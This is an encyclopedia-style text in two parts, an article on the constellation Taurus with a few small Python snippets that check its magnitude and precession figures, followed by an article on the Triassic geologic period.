Taurus is a large and prominent constellation in the northern hemisphere's winter sky, between Aries to the west and Gemini to the east; to the north lie Perseus and Auriga, to the southeast Orion, to the south Eridanus, and to the southwest Cetus. In late November and early December, Taurus reaches opposition (its furthest point from the Sun) and is visible the entire night. By late March, it is setting at sunset, and it completely disappears behind the Sun's glare from May to July. This constellation forms part of the zodiac and hence is intersected by the ecliptic. This circle across the celestial sphere forms the apparent path of the Sun as the Earth completes its annual orbit. As the orbital planes of the Moon and the planets lie near the ecliptic, they can usually be found in the constellation Taurus during some part of each year. The galactic plane of the Milky Way intersects the northeast corner of the constellation, and the galactic anticenter is located near the border between Taurus and Auriga. Taurus is the only constellation crossed by all three of the galactic equator, celestial equator, and ecliptic. A ring-like galactic structure known as Gould's Belt passes through the constellation. The recommended three-letter abbreviation for the constellation, as adopted by the International Astronomical Union in 1922, is "Tau". The official constellation boundaries, as set by Belgian astronomer Eugène Delporte in 1930, are defined by a polygon of 26 segments. In the equatorial coordinate system, the right ascension coordinates of these borders lie between and , while the declination coordinates are between 31.10° and −1.35°. Because a small part of the constellation lies to the south of the celestial equator, it cannot be a completely circumpolar constellation at any latitude.
Features
Stars
There are four stars brighter than magnitude 3 in Taurus. The brightest member of this constellation is Aldebaran, an orange-hued, spectral class K5 III giant star. Its name derives from the Arabic for "the follower", probably from the fact that it follows the Pleiades during the nightly motion of the celestial sphere across the sky. Forming the profile of a bull's face is a V- or K-shaped asterism of stars.
This outline is created by prominent members of the Hyades, the nearest distinct open star cluster after the Ursa Major Moving Group. In this profile, Aldebaran forms the bull's bloodshot eye, which has been described as "glaring menacingly at the hunter Orion", a constellation that lies just to the southeast. Aldebaran has around 116% of the Sun's mass. It also hosts a candidate exoplanet. The Hyades span about 5° of the sky, so they can only be viewed in their entirety with binoculars or the unaided eye. They include a naked-eye double star, Theta Tauri (the proper name of Theta2 Tauri is Chamukuy), with a separation of 5.6 arcminutes. In the northwestern quadrant of the Taurus constellation lie the Pleiades (M45), one of the best known open clusters, easily visible to the naked eye. The seven most prominent stars in this cluster are of visual magnitude six or brighter, and so the cluster is also named the "Seven Sisters". However, many more stars are visible with even a modest telescope. Astronomers estimate that the cluster has approximately 500–1,000 stars, all of which are around 100 million years old. However, they vary considerably in type. The brightest members of the Pleiades are large, luminous stars, but the cluster also contains many small brown dwarfs and white dwarfs. The cluster is estimated to dissipate in another 250 million years. The Pleiades cluster is classified as a Shapley class c and Trumpler class I 3 r n cluster, indicating that it is irregularly shaped and loose, though concentrated at its center and detached from the star field. To the east, the two horns of the bull are formed by Beta (β) Tauri and Zeta (ζ) Tauri, two star systems that are separated by 8°. Beta is a white, spectral class B7 III giant star known as El Nath, which comes from the Arabic phrase for "the butting", as in butting by the horns of the bull. At magnitude 1.65, it is the second brightest star in the constellation, and it shares the border with the neighboring constellation of Auriga. As a result, it also bears the designation Gamma Aurigae. Zeta Tauri (the proper name is Tianguan) is an eclipsing binary star that completes an orbit every 133 days. The star Lambda (λ) Tauri is an eclipsing binary star. This system consists of a spectral class B3 star being orbited by a less massive class A4 star. The plane of their orbit lies almost along the line of sight to the Earth. Every 3.953 days the system temporarily decreases in brightness by 1.1 magnitudes as the brighter star is partially eclipsed by the dimmer companion. The two stars are separated by only 0.1 astronomical units, so their shapes are modified by mutual tidal interaction. This results in a variation of their net magnitude throughout each orbit. Located about 1.8° west of Epsilon (ε) Tauri is T Tauri, the prototype of a class of variable stars called T Tauri stars. This star undergoes erratic changes in luminosity, varying between magnitude 9 and 13 over a period of weeks or months. This is a newly formed stellar object that is just emerging from its envelope of gas and dust, but has not yet become a main sequence star. The surrounding reflection nebula NGC 1555 is illuminated by T Tauri, and thus is also variable in luminosity. To the north lies Kappa Tauri, a visual double star consisting of two A7-type components. The pair have a separation of just 5.6 arcminutes, making them a challenge to split with the naked eye.
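The 1.1-magnitude eclipses of Lambda Tauri quoted above can be translated into a flux ratio using the standard Pogson relation $\Delta m = -2.5 \log_{10}(F_1/F_2)$; the sketch below is illustrative (the relation is standard astronomy, not stated in the article):

```python
def remaining_flux_fraction(delta_mag: float) -> float:
    """Fraction of light left after a brightness drop of delta_mag magnitudes."""
    return 10 ** (-0.4 * delta_mag)

# Lambda Tauri dims by 1.1 magnitudes at primary eclipse (value from the text)
print(round(remaining_flux_fraction(1.1), 3))  # 0.363 -> about 36% of the light remains
```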
Deep-sky objects
In the northern part of the constellation, to the northeast of the Pleiades, lies the Crystal Ball Nebula, known by its catalogue designation NGC 1514. This planetary nebula is of historical interest following its discovery by the German-born English astronomer William Herschel in 1790. Prior to that time, astronomers had assumed that nebulae were simply unresolved groups of stars. However, Herschel could clearly resolve a star at the center of the nebula that was surrounded by a nebulous cloud of some type. In 1864, English astronomer William Huggins used the spectrum of this nebula to deduce that the nebula is a luminous gas, rather than stars. Northwest of ζ Tauri by 1.15 degrees is the Crab Nebula (M1), a supernova remnant. This expanding nebula was created by a Type II supernova explosion, which was seen from Earth on July 4, 1054. It was bright enough to be observed during the day and is mentioned in Chinese historical texts. At its peak, the supernova reached magnitude −4, but the nebula is currently magnitude 8.4 and requires a telescope to observe. North American peoples also observed the supernova, as evidenced by a painting in a New Mexican canyon and various pieces of pottery that depict the event. However, the remnant itself was not discovered until 1731, when John Bevis found it. This constellation includes part of the Taurus-Auriga complex, or Taurus dark clouds, a star-forming region containing sparse, filamentary clouds of gas and dust. This spans a diameter of and contains 35,000 solar masses of material, which is both larger and less massive than the Orion Nebula. At a distance of , this is one of the nearest active star-forming regions. Located in this region, about 10° to the northeast of Aldebaran, is the asterism NGC 1746, spanning a width of 45 arcminutes.
Meteor showers
During November, the Taurid meteor shower appears to radiate from the general direction of this constellation. The Beta Taurid meteor shower occurs during June and July in the daytime and is normally observed using radio techniques. Between 18 and 29 October, both the Northern Taurids and the Southern Taurids are active, though the latter stream is stronger. However, between November 1 and 10, the two streams equalize.
History and mythology
The identification of the constellation of Taurus with a bull is very old, certainly dating to the Chalcolithic, and perhaps even to the Upper Paleolithic. Michael Rappenglück of the University of Munich believes that Taurus is represented in a cave painting at the Hall of the Bulls in the caves at Lascaux (dated to roughly 15,000 BC), which he believes is accompanied by a depiction of the Pleiades. The name "seven sisters" has been used for the Pleiades in the languages of many cultures, including indigenous groups of Australia, North America and Siberia. This suggests that the name may have a common ancient origin. Taurus marked the point of the vernal (spring) equinox in the Chalcolithic and the Early Bronze Age, from about 4000 BC to 1700 BC, after which it moved into the neighboring constellation Aries. The Pleiades were closest to the Sun at the vernal equinox around the 23rd century BC. In Babylonian astronomy, the constellation was listed in the MUL.APIN as "The Bull of Heaven".
Although it has been claimed that "when the Babylonians first set up their zodiac, the vernal equinox lay in Taurus," the MUL.APIN tablets have also been read as indicating that the vernal equinox was marked by the Babylonian constellation known as "the hired man" (the modern Aries). In the Old Babylonian Epic of Gilgamesh, the goddess Ishtar sends Taurus, the Bull of Heaven, to kill Gilgamesh for spurning her advances. Enkidu tears off the bull's hind part and hurls the quarters into the sky, where they become the stars we know as Ursa Major and Ursa Minor. Some locate Gilgamesh as the neighboring constellation of Orion, facing Taurus as if in combat, while others identify him with the sun whose rising on the equinox vanquishes the constellation. In early Mesopotamian art, the Bull of Heaven was closely associated with Inanna, the Sumerian goddess of sexual love, fertility, and warfare. One of the oldest depictions shows the bull standing before the goddess' standard; since it has three stars depicted on its back (the cuneiform sign for "star-constellation"), there is good reason to regard this as the constellation later known as Taurus. The same iconic representation of the Heavenly Bull was depicted in the Dendera zodiac, an Egyptian bas-relief carving in a ceiling that depicted the celestial hemisphere using a planisphere. In these ancient cultures, the orientation of the horns was portrayed as upward or backward. This differed from the later Greek depiction, where the horns pointed forward. To the Egyptians, the constellation Taurus was a sacred bull that was associated with the renewal of life in spring. When the spring equinox entered Taurus, the constellation would become covered by the Sun in the western sky as spring began. This "sacrifice" led to the renewal of the land. To the early Hebrews, Taurus was the first constellation in their zodiac, and consequently it was represented by the first letter in their alphabet, Aleph. In Greek mythology, Taurus was identified with Zeus, who assumed the form of a magnificent white bull to abduct Europa, a legendary Phoenician princess. In illustrations of Greek mythology, only the front portion of this constellation is depicted; this was sometimes explained as Taurus being partly submerged as he carried Europa out to sea. A second Greek myth portrays Taurus as Io, a mistress of Zeus. To hide his lover from his wife Hera, Zeus changed Io into the form of a heifer. The Greek mythographer Acusilaus marks the bull Taurus as the same as the one that formed the myth of the Cretan Bull, one of The Twelve Labors of Heracles. Taurus became an important object of worship among the Druids. Their Tauric religious festival was held while the Sun passed through the constellation. Among the Arctic people known as the Inuit, the constellation is called Sakiattiat, and the Hyades is Nanurjuk, with the latter representing the spirit of the polar bear. Aldebaran represents the bear, with the remainder of the stars in the Hyades being dogs that are holding the beast at bay. In Buddhism, legends hold that Gautama Buddha was born when the full moon was in Vaisakha, or Taurus. Buddha's birthday is celebrated with the Wesak Festival, or Vesākha, which occurs on the first or second full moon when the Sun is in Taurus. In 1990, due to the precession of the equinoxes, the position of the Sun on the first day of summer (June 21) crossed the IAU boundary of Gemini into Taurus.
The Sun will slowly move through Taurus at a rate of 1° east every 72 years until approximately 2600 AD, at which point it will be in Aries on the first day of summer.
Astrology
The Sun currently appears in the constellation Taurus from May 13 to June 21. In tropical astrology, the Sun is considered to be in the sign Taurus from April 20 to May 20.
Space exploration
The space probe Pioneer 10 is moving in the direction of this constellation, though it will not near any of the stars in this constellation for many thousands of years, by which time its batteries will be long dead.
Solar eclipse of May 29, 1919
Several stars in the Hyades star cluster, including Kappa Tauri, were photographed during the total solar eclipse of May 29, 1919, by the expedition of Arthur Eddington in Príncipe and by others in Sobral, Brazil. The observations confirmed Albert Einstein's prediction of the bending of light around the Sun, made in his general theory of relativity, which he published in 1915.
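The precession figures quoted above are easy to sanity-check. In the sketch below, the ~25,772-year precession period is a standard value supplied as an assumption, not a figure from the article:

```python
PRECESSION_PERIOD_YEARS = 25_772          # standard value for one full precession cycle

years_per_degree = PRECESSION_PERIOD_YEARS / 360
print(round(years_per_degree, 1))         # 71.6 -> matches "1 degree every ~72 years"

# Degrees of solstice-point drift between the 1990 boundary crossing and the
# approximately 2600 AD date given in the text for the move into Aries:
print(round((2600 - 1990) / years_per_degree, 1))   # ~8.5 degrees
```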
Physical sciences
Zodiac
Astronomy
29989
https://en.wikipedia.org/wiki/Triassic
Triassic
The Triassic (sometimes symbolized 🝈) is a geologic period and system which spans 50.5 million years from the end of the Permian Period, 251.902 million years ago (Mya), to the beginning of the Jurassic Period, 201.4 Mya. The Triassic is the first and shortest period of the Mesozoic Era and the seventh period of the Phanerozoic Eon. Both the start and end of the period are marked by major extinction events. The Triassic Period is subdivided into three epochs: Early Triassic, Middle Triassic and Late Triassic.
The Triassic began in the wake of the Permian–Triassic extinction event, which left the Earth's biosphere impoverished; it was well into the middle of the Triassic before life recovered its former diversity. Three categories of organisms can be distinguished in the Triassic record: survivors from the extinction event, new groups that flourished briefly, and other new groups that went on to dominate the Mesozoic Era. Reptiles, especially archosaurs, were the chief terrestrial vertebrates during this time. A specialized group of archosaurs, called dinosaurs, first appeared in the Late Triassic but did not become dominant until the succeeding Jurassic Period. The archosaurs that became dominant in this period were primarily pseudosuchians, relatives and ancestors of modern crocodilians, while some archosaurs specialized in flight, becoming the pterosaurs, the first flying vertebrates. Therapsids, the dominant vertebrates of the preceding Permian period, saw a brief surge in diversification in the Triassic, with dicynodonts and cynodonts quickly becoming dominant, but they declined throughout the period, with the majority becoming extinct by its end. However, the first stem-group mammals (mammaliamorphs), themselves a specialized subgroup of cynodonts, appeared during the Triassic and would survive the extinction event, allowing them to radiate during the Jurassic. Amphibians were primarily represented by the temnospondyls, giant aquatic predators that had survived the end-Permian extinction and saw a new burst of diversification in the Triassic before going extinct by its end; however, early crown-group lissamphibians (including stem-group frogs, salamanders and caecilians) also became more common during the Triassic and survived the extinction event. The earliest known neopterygian fish, including early holosteans and teleosts, appeared near the beginning of the Triassic and quickly diversified to become among the dominant groups of fish in both freshwater and marine habitats.
The vast supercontinent of Pangaea dominated the globe during the Triassic, but in the latest Triassic (Rhaetian) and Early Jurassic it began to gradually rift into two separate landmasses: Laurasia to the north and Gondwana to the south. The global climate during the Triassic was mostly hot and dry, with deserts spanning much of Pangaea's interior. However, the climate shifted and became more humid as Pangaea began to drift apart. The end of the period was marked by yet another major mass extinction, the Triassic–Jurassic extinction event, which wiped out many groups, including most pseudosuchians, and allowed dinosaurs to assume dominance in the Jurassic.
Etymology
The Triassic was named in 1834 by Friedrich August von Alberti, after a succession of three distinct rock layers (from the Greek for 'triad') that are widespread in southern Germany: the lower Buntsandstein (colourful sandstone), the middle Muschelkalk (shell-bearing limestone) and the upper Keuper (coloured clay).
Dating and subdivisions
On the geologic time scale, the Triassic is usually divided into Early, Middle, and Late Triassic Epochs, and the corresponding rocks are referred to as Lower, Middle, or Upper Triassic. The faunal stages from youngest to oldest are the Rhaetian, Norian, and Carnian (Late Triassic); the Ladinian and Anisian (Middle Triassic); and the Olenekian and Induan (Early Triassic).
Paleogeography
During the Triassic, almost all the Earth's land mass was concentrated into a single supercontinent, Pangaea. This supercontinent was more or less centered on the equator and extended between the poles, though it did drift northwards as the period progressed. Southern Pangaea, also known as Gondwana, was made up of closely appressed cratons corresponding to modern South America, Africa, Madagascar, India, Antarctica, and Australia. Northern Pangaea, also known as Laurussia or Laurasia, corresponds to modern-day North America and the fragmented predecessors of Eurasia. The western edge of Pangaea lay at the margin of an enormous ocean, Panthalassa, which roughly corresponds to the modern Pacific Ocean. Practically all deep-ocean crust present during the Triassic has been recycled through the subduction of oceanic plates, so very little is known about the open ocean from this time period. Most information on Panthalassan geology and marine life is derived from island arcs and rare seafloor sediments accreted onto surrounding land masses, such as present-day Japan and western North America. The eastern edge of Pangaea was encroached upon by a pair of extensive oceanic basins: the Neo-Tethys (or simply Tethys) and Paleo-Tethys Oceans. These extended from China to Iberia, hosting abundant marine life along their shallow tropical peripheries. They were divided from each other by a long string of microcontinents known as the Cimmerian terranes. Cimmerian crust had detached from Gondwana in the early Permian and drifted northwards during the Triassic, enlarging the Neo-Tethys Ocean which formed in their wake. At the same time, they forced the Paleo-Tethys Ocean to shrink as it was being subducted under Asia. By the end of the Triassic, the Paleo-Tethys Ocean occupied a small area, and the Cimmerian terranes began to collide with southern Asia. This collision, known as the Cimmerian Orogeny, continued into the Jurassic and Cretaceous to produce a chain of mountain ranges stretching from Turkey to Malaysia. Pangaea was fractured by widespread faulting and rift basins during the Triassic, especially late in the period, but had not yet separated. The first nonmarine sediments in the rift that marks the initial break-up of Pangaea, which separated eastern North America from Morocco, are of Late Triassic age; in the United States, these thick sediments comprise the Newark Supergroup. Rift basins are also common in South America, Europe, and Africa. Terrestrial environments are particularly well represented in South Africa, Russia, central Europe, and the southwestern United States. Terrestrial Triassic biostratigraphy is mostly based on terrestrial and freshwater tetrapods, as well as conchostracans ("clam shrimps"), a type of fast-breeding crustacean which lived in lakes and hypersaline environments. Because a supercontinent has less shoreline than a series of smaller continents, Triassic marine deposits are relatively uncommon on a global scale. A major exception is in Western Europe, where the Triassic was first studied. The northeastern margin of Gondwana was a stable passive margin along the Neo-Tethys Ocean, and marine sediments have been preserved in parts of northern India and Arabia.
In North America, marine deposits are limited to a few exposures in the west.
Scandinavia
During the Triassic, peneplains are thought to have formed in what is now Norway and southern Sweden. Remnants of this peneplain can be traced as a tilted summit accordance on the Swedish West Coast. In northern Norway, Triassic peneplains may have been buried in sediments and then re-exposed as coastal plains called strandflats. Dating of illite clay from a strandflat on Bømlo, southern Norway, has shown that the landscape there became weathered in Late Triassic times (around 210 million years ago), with the landscape likely also being shaped during that time.
Paleoceanography
Eustatic sea level in the Triassic was consistently low compared to the other geological periods. The beginning of the Triassic was around present sea level, rising to about above present-day sea level during the Early and Middle Triassic. Sea level rise accelerated in the Ladinian, culminating with a sea level up to above present-day levels during the Carnian. Sea level began to decline in the Norian, reaching a low of below present sea level during the mid-Rhaetian. Low global sea levels persisted into the earliest Jurassic. Superimposed on this long-term trend are 22 sea level drop events that are widespread in the geologic record, mostly of minor (less than ) and medium () magnitudes. The lack of evidence for Triassic continental ice sheets suggests that glacial eustasy is unlikely to be the cause of these changes.
Climate
The Triassic continental interior climate was generally hot and dry, so that typical deposits are red bed sandstones and evaporites. There is no evidence of glaciation at or near either pole; in fact, the polar regions were apparently moist and temperate, providing a climate suitable for forests and vertebrates, including reptiles. Pangaea's large size limited the moderating effect of the global ocean; its continental climate was highly seasonal, with very hot summers and cold winters. The strong contrast between the Pangaea supercontinent and the global ocean triggered intense cross-equatorial monsoons, sometimes referred to as the Pangaean megamonsoons. The Triassic may have mostly been a dry period, but evidence exists that it was punctuated by several episodes of increased rainfall in tropical and subtropical latitudes of the Tethys Sea and its surrounding land. Sediments and fossils suggestive of a more humid climate are known from the Anisian to Ladinian of the Tethysian domain, and from the Carnian and Rhaetian of a larger area that also includes the Boreal domain (e.g., the Svalbard Islands), the North American continent, the South China block and Argentina. The best studied of these episodes of humid climate, and probably the most intense and widespread, was the Carnian Pluvial Event.
Early Triassic
The Early Triassic was the hottest portion of the entire Phanerozoic, as it occurred during and immediately after the discharge of titanic volumes of greenhouse gases from the Siberian Traps. The Early Triassic began with the Permian-Triassic Thermal Maximum (PTTM) and was followed by the brief Dienerian Cooling (DC) from 251 to 249 Ma, which was in turn followed by the Latest Smithian Thermal Maximum (LSTT) around 249 to 248 Ma. During the Latest Olenekian Cooling (LOC), from 248 to 247 Ma, temperatures cooled by about 6 °C.
Middle Triassic
The Middle Triassic was cooler than the Early Triassic, with temperatures falling over most of the Anisian, with the exception of a warming spike in the latter portion of the stage. From 242 to 233 Ma, the Ladinian-Carnian Cooling (LCC) ensued.
Late Triassic
At the beginning of the Carnian, global temperatures continued to be relatively cool. The eruption of the Wrangellia Large Igneous Province around 234 Ma caused abrupt global warming, terminating the cooling trend of the LCC. This warming was responsible for the Carnian Pluvial Event (CPE) and resulted in an episode of widespread global humidity. The CPE ushered in the Mid-Carnian Warm Interval (MCWI), which lasted from 234 to 227 Ma. A positive δ13C excursion at the Carnian-Norian boundary is believed to signify an increase in organic carbon burial. From 227 to 217 Ma, there was a relatively cool period known as the Early Norian Cool Interval (ENCI), after which occurred the Mid-Norian Warm Interval (MNWI) from 217 to 209 Ma. The MNWI was briefly interrupted around 214 Ma by a cooling possibly related to the Manicouagan impact. Around 212 Ma, a 10 Myr eccentricity maximum caused a paludification of Pangaea and a reduction in the size of arid climatic zones. The Rhaetian Cool Interval (RCI) lasted from 209 to 201 Ma. At the terminus of the Triassic, there was an extreme warming event referred to as the End-Triassic Thermal Event (ETTE), which was responsible for the Triassic-Jurassic mass extinction. Bubbles of carbon dioxide in basaltic rocks dating back to the end of the Triassic indicate that volcanic activity from the Central Atlantic Magmatic Province helped trigger the climate change of the ETTE.
Flora
Land plants
During the Early Triassic, lycophytes, particularly those of the order Isoetales (which contains the living quillworts), rose to prominence due to the environmental instability following the Permian-Triassic extinction; one particularly notable example is the genus Pleuromeia, which grew in a column-like fashion, sometimes reaching a height of . The relevance of lycophytes declined from the Middle Triassic onwards, following the return of more stable environmental conditions. Although it first appeared during the Permian, the extinct seed plant group Bennettitales first became a prominent element of global floras during the Late Triassic, a position it would hold for much of the Mesozoic. In the Southern Hemisphere landmasses of Gondwana, the tree Dicroidium, an extinct "seed fern" belonging to the order Corystospermales, was a dominant element of forest habitats across the region during the Middle-Late Triassic. During the Late Triassic, the Ginkgoales (which today are represented by only a single species, Ginkgo biloba) underwent considerable diversification. Conifers were abundant during the Triassic and included the Voltziales (which contains various lineages, probably including those ancestral to modern conifers), as well as the extinct family Cheirolepidiaceae, which first appeared in the Late Triassic and would be prominent throughout most of the rest of the Mesozoic.
Coal
No known coal deposits date from the start of the Triassic Period. This is known as the Early Triassic "coal gap" and can be seen as part of the Permian–Triassic extinction event.
Possible explanations for the coal gap include sharp drops in sea level at the time of the Permo-Triassic boundary; acid rain from the Siberian Traps eruptions or from an impact event that overwhelmed acidic swamps; a climate shift to a greenhouse climate that was too hot and dry for peat accumulation; the evolution of fungi or herbivores that were more destructive of wetlands; the extinction of all plants adapted to peat swamps, with a hiatus of several million years before new plant species evolved that were adapted to peat swamps; or soil anoxia as oxygen levels plummeted.

Phytoplankton
Before the Permian extinction, Archaeplastida (red and green algae) had been the major marine phytoplankton since about 659–645 million years ago, when they replaced marine planktonic cyanobacteria, which first appeared about 800 million years ago, as the dominant phytoplankton in the oceans. In the Triassic, secondary endosymbiotic algae became the most important plankton.

Fauna

Marine invertebrates
In marine environments, new modern types of corals appeared in the Early Triassic, forming small patches of reefs of modest extent compared to the great reef systems of Devonian or modern times. At the end of the Carnian, a reef crisis occurred in South China. Serpulids appeared in the Middle Triassic. Microconchids were abundant. The shelled cephalopods called ammonites recovered, diversifying from a single line that survived the Permian extinction. Bivalves began to rapidly diversify during the Middle Triassic, becoming highly abundant in the oceans.

Insects
Aquatic insects rapidly diversified during the Middle Triassic, with this time interval representing a crucial diversification for Holometabola, the clade containing the majority of modern insect species.

Fish
In the wake of the Permian-Triassic mass extinction event, the fish fauna was remarkably uniform, with many families and genera exhibiting a cosmopolitan distribution. Coelacanths show their highest post-Devonian diversity in the Early Triassic. Ray-finned fishes (actinopterygians) went through a remarkable diversification in the beginning of the Triassic, leading to peak diversity during the Middle Triassic; however, the pattern of this diversification is still not well understood due to a taphonomic megabias. The first stem-group teleosts appeared during the Triassic (teleosts are by far the most diverse group of fish today). Predatory actinopterygians such as saurichthyids and birgeriids, some of which grew over in length, appeared in the Early Triassic and became widespread and successful during the period as a whole. Lakes and rivers were populated by lungfish (Dipnoi), such as Ceratodus, which are mainly known from their dental plates, abundant in the fossil record. Hybodonts, a group of shark-like cartilaginous fish, were dominant in both freshwater and marine environments throughout the Triassic. The last survivors of the mainly Palaeozoic Eugeneodontida are known from the Early Triassic.

Amphibians
Temnospondyl amphibians were among those groups that survived the Permian–Triassic extinction. Once abundant in both terrestrial and aquatic environments, the terrestrial species had mostly died out during the extinction event. The Triassic survivors were aquatic or semi-aquatic, and were represented by Tupilakosaurus, Thabanchuia, Branchiosauridae and Micropholis, all of which died out in the Early Triassic, and the successful Stereospondyli, with survivors into the Cretaceous Period.
The largest Triassic stereospondyls, such as Mastodonsaurus, were up to in length. Some lineages (e.g. trematosaurs) flourished briefly in the Early Triassic, while others (e.g. capitosaurs) remained successful throughout the whole period, or only came to prominence in the Late Triassic (e.g. Plagiosaurus, metoposaurs). The first lissamphibians (modern amphibians) appear in the Triassic, with the progenitors of the first frogs already present by the Early Triassic. However, the group as a whole did not become common until the Jurassic, when the temnospondyls had become very rare. Most of the Reptiliomorpha, stem-amniotes that gave rise to the amniotes, disappeared in the Triassic, but two water-dwelling groups survived: the Embolomeri, which only survived into the early part of the period, and the Chroniosuchia, which survived until the end of the Triassic.

Reptiles

Archosauromorphs
The Permian–Triassic extinction devastated terrestrial life. Biodiversity rebounded as the surviving species repopulated empty terrain, but these early communities were short-lived. Diverse communities with complex food-web structures took 30 million years to reestablish. Archosauromorph reptiles, which had already appeared and diversified to an extent in the Permian Period, exploded in diversity as an adaptive radiation in response to the Permian-Triassic mass extinction. By the Early Triassic, several major archosauromorph groups had appeared. Long-necked, lizard-like early archosauromorphs were known as protorosaurs, likely a paraphyletic group rather than a true clade. Tanystropheids were a family of protorosaurs which took neck size to extremes, with the largest genus, Tanystropheus, having a neck longer than its body. The protorosaur family Sharovipterygidae used their elongated hindlimbs for gliding. Other archosauromorphs, such as rhynchosaurs and allokotosaurs, were mostly stocky-bodied herbivores with specialized jaw structures. Rhynchosaurs, barrel-gutted herbivores, thrived for only a short period of time, becoming extinct about 220 million years ago. They were exceptionally abundant in the middle of the Triassic, as the primary large herbivores in many Carnian-age ecosystems. They sheared plants with premaxillary beaks and plates along the upper jaw with multiple rows of teeth. Allokotosaurs were iguana-like reptiles, including Trilophosaurus (a common Late Triassic reptile with three-crowned teeth), Teraterpeton (which had a long beak-like snout), and Shringasaurus (a horned herbivore which reached a body length of ). One group of archosauromorphs, the archosauriforms, were distinguished by their active predatory lifestyle, with serrated teeth and upright limb postures. Archosauriforms were diverse in the Triassic, including various terrestrial and semiaquatic predators of all shapes and sizes. The large-headed and robust erythrosuchids were among the dominant carnivores in the Early Triassic. Phytosaurs were a particularly common group which prospered during the Late Triassic. These long-snouted and semiaquatic predators resembled living crocodiles and probably had a similar lifestyle, hunting for fish and small reptiles around the water's edge. However, this resemblance is only superficial and is a prime example of convergent evolution. True archosaurs appeared in the Early Triassic, splitting into two branches: Avemetatarsalia (the ancestors of birds) and Pseudosuchia (the ancestors of crocodilians).
Avemetatarsalians were a minor component of their ecosystems, but eventually produced the earliest pterosaurs and dinosaurs in the Late Triassic. Early long-tailed pterosaurs appeared in the Norian and quickly spread worldwide. Triassic dinosaurs evolved in the Carnian and include early sauropodomorphs and theropods. Most Triassic dinosaurs were small predators and only a few were common, such as Coelophysis, which was long. Triassic sauropodomorphs primarily inhabited cooler regions of the world. The large predator Smok was most likely also an archosaur, but it is uncertain whether it was a primitive dinosaur or a pseudosuchian. Pseudosuchians were far more ecologically dominant in the Triassic, including large herbivores (such as aetosaurs), large carnivores ("rauisuchians"), and the first crocodylomorphs ("sphenosuchians"). Aetosaurs were heavily armored reptiles that were common during the last 30 million years of the Late Triassic until they died out in the Triassic-Jurassic extinction. Most aetosaurs were herbivorous and fed on low-growing plants, but some may have eaten meat. "Rauisuchians" (formally known as paracrocodylomorphs) were the keystone predators of most Triassic terrestrial ecosystems. Over 25 species have been found, including giant quadrupedal hunters, sleek bipedal omnivores, and lumbering beasts with deep sails on their backs. They probably occupied the large-predator niche later filled by theropods. "Rauisuchians" were ancestral to small, lightly built crocodylomorphs, the only pseudosuchians which survived into the Jurassic.

Marine reptiles
There were many types of marine reptiles. These included the Sauropterygia, which featured pachypleurosaurs and nothosaurs (both common during the Middle Triassic, especially in the Tethys region), placodonts, the earliest known herbivorous marine reptile Atopodentatus, and the first plesiosaurs. The first of the lizard-like Thalattosauria (askeptosaurs) and the highly successful ichthyopterygians, which appeared in Early Triassic seas, soon diversified. By the Middle Triassic, some ichthyopterygians were achieving very large body masses.

Other reptiles
Among other reptiles, the earliest turtles, like Proganochelys and Proterochersis, appeared during the Norian Age (Stage) of the Late Triassic Period. The Lepidosauromorpha, specifically the Sphenodontia, are first found in the fossil record of the earlier Carnian Age, though the earliest lepidosauromorphs likely occurred in the Permian. The Procolophonidae, the last surviving parareptiles, were an important group of small lizard-like herbivores. The drepanosaurs were a clade of unusual, chameleon-like arboreal reptiles with birdlike heads and specialised claws.

Synapsids
Three therapsid groups survived into the Triassic: dicynodonts, therocephalians, and cynodonts. The cynodont Cynognathus was a characteristic top predator in the Olenekian and Anisian of Gondwana. Both kannemeyeriiform dicynodonts and gomphodont cynodonts remained important herbivores during much of the period. Therocephalians included both large predators (Moschorhinus) and herbivorous forms (bauriids) until their extinction midway through the period. Ecteniniid cynodonts played a role as large-sized, cursorial predators in the Late Triassic. During the Carnian (early part of the Late Triassic), some advanced cynodonts gave rise to the first mammals. During the Triassic, archosaurs displaced therapsids as the largest and most ecologically prolific terrestrial amniotes.
This "Triassic Takeover" may have contributed to the evolution of mammals by forcing the surviving therapsids and their mammaliaform successors to live as small, mainly nocturnal insectivores. Nocturnal life may have forced the mammaliaforms to develop fur and a higher metabolic rate. Lagerstätten Two Early Triassic lagerstätten (high-quality fossil beds), the Dienerian aged Guiyang biota and the earliest Spathian aged Paris biota stand out due to their exceptional preservation and diversity. They represent the earliest lagerstätten of the Mesozoic era and provide insight into the biotic recovery from the Permian-Triassic mass extinction event. The Monte San Giorgio lagerstätte, now in the Lake Lugano region of northern Italy and southern Switzerland, was in Middle Triassic times a lagoon behind reefs with an anoxic bottom layer, so there were no scavengers and little turbulence to disturb fossilization, a situation that can be compared to the better-known Jurassic Solnhofen Limestone lagerstätte. The remains of fish and various marine reptiles (including the common pachypleurosaur Neusticosaurus, and the bizarre long-necked archosauromorph Tanystropheus), along with some terrestrial forms like Ticinosuchus and Macrocnemus, have been recovered from this locality. All these fossils date from the Anisian and Ladinian ages (about 242 Ma ago). Triassic–Jurassic extinction event The Triassic Period ended with a mass extinction, which was particularly severe in the oceans; the conodonts disappeared, as did all the marine reptiles except ichthyosaurs and plesiosaurs. Invertebrates like brachiopods and molluscs (such as gastropods) were severely affected. In the oceans, 22% of marine families and possibly about half of marine genera went missing. Though the end-Triassic extinction event was not equally devastating in all terrestrial ecosystems, several important clades of crurotarsans (large archosaurian reptiles previously grouped together as the thecodonts) disappeared, as did most of the large labyrinthodont amphibians, groups of small reptiles, and most synapsids. Some of the early, primitive dinosaurs also became extinct, but more adaptive ones survived to evolve into the Jurassic. Surviving plants that went on to dominate the Mesozoic world included modern conifers and cycadeoids. The cause of the Late Triassic extinction is uncertain. It was accompanied by huge volcanic eruptions that occurred as the supercontinent Pangaea began to break apart about 202 to 191 million years ago (40Ar/39Ar dates), forming the Central Atlantic Magmatic Province (CAMP), one of the largest known inland volcanic events since the planet had first cooled and stabilized. Other possible but less likely causes for the extinction events include global cooling or even a bolide impact, for which an impact crater containing Manicouagan Reservoir in Quebec, Canada, has been singled out. However, the Manicouagan impact melt has been dated to 214±1 Mya. The date of the Triassic-Jurassic boundary has also been more accurately fixed recently, at Mya. Both dates are gaining accuracy by using more accurate forms of radiometric dating, in particular the decay of uranium to lead in zircons formed at time of the impact. So, the evidence suggests the Manicouagan impact preceded the end of the Triassic by approximately 10±2 Ma. It could not therefore be the immediate cause of the observed mass extinction. The number of Late Triassic extinctions is disputed. 
